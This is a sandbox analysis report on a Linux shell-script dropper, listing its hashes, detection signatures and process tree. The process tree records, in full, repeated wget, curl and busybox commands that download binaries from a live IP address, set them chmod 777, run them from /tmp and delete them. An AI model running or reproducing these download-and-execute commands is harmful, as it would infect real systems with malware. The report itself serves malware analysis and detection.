Analysis
-
max time kernel
32s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
14-11-2024 02:42
Static task
static1
Behavioral task
behavioral1
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh
-
Size
10KB
-
MD5
917b3d2f50ea971b48d53c43acb35304
-
SHA1
bfe50bdd2f5d3467fef4e1a330a33fa6467e3b31
-
SHA256
7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918
-
SHA512
0580e33716000342d8c2cb7288ca5d23607157542b578cd1f809877f776e9cade3cf808e804987ae0904bf5e8cb440e05090f15d6a7bce6e6af8e5b1b54b1cd4
-
SSDEEP
192:ES2PBbUb8bkbfbDbjfLN2uYRPn/6GpCe6MZRrNe6MZRH7gPn/6GibUb8bkbfbDb6:ES2P2fLN2uYfCe6MZRrNe6MZRH7CfLN8
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh1⤵PID:1496
-
/bin/rm/bin/rm bins.sh2⤵PID:1497
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1498
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Writes file to tmp directory
PID:1503
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1504
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:1505
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:1506
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1507
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1508
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Writes file to tmp directory
PID:1509
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1510
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:1511
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:1512
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1513
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Writes file to tmp directory
PID:1515
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1516
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:1517
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:1518
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1519
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1520
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1522
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:1524
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1525
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1526
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1528
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:1529
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:1530
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1531
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1532
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1534
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1540
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1546
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1552
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1558
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1564
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1570
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1576
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1582
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1588
-
-
/bin/chmodchmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1594
-
-
/bin/chmodchmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ2⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1600
-
-
/bin/chmodchmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q2⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1606
-
-
/bin/chmodchmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D02⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1612
-
-
/bin/chmodchmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj02⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1618
-
-
/bin/chmodchmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1624
-
-
/bin/chmodchmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1630
-
-
/bin/chmodchmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1636
-
-
/bin/chmodchmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1642
-
-
/bin/chmodchmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq42⤵PID:1645
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1646
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1648
-
-
/bin/chmodchmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O2⤵PID:1651
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1656
-
-
/bin/chmodchmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz2⤵PID:1659
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1662
-
-
/bin/chmodchmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE2⤵PID:1665
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1668
-
-
/bin/chmodchmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx2⤵PID:1671
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97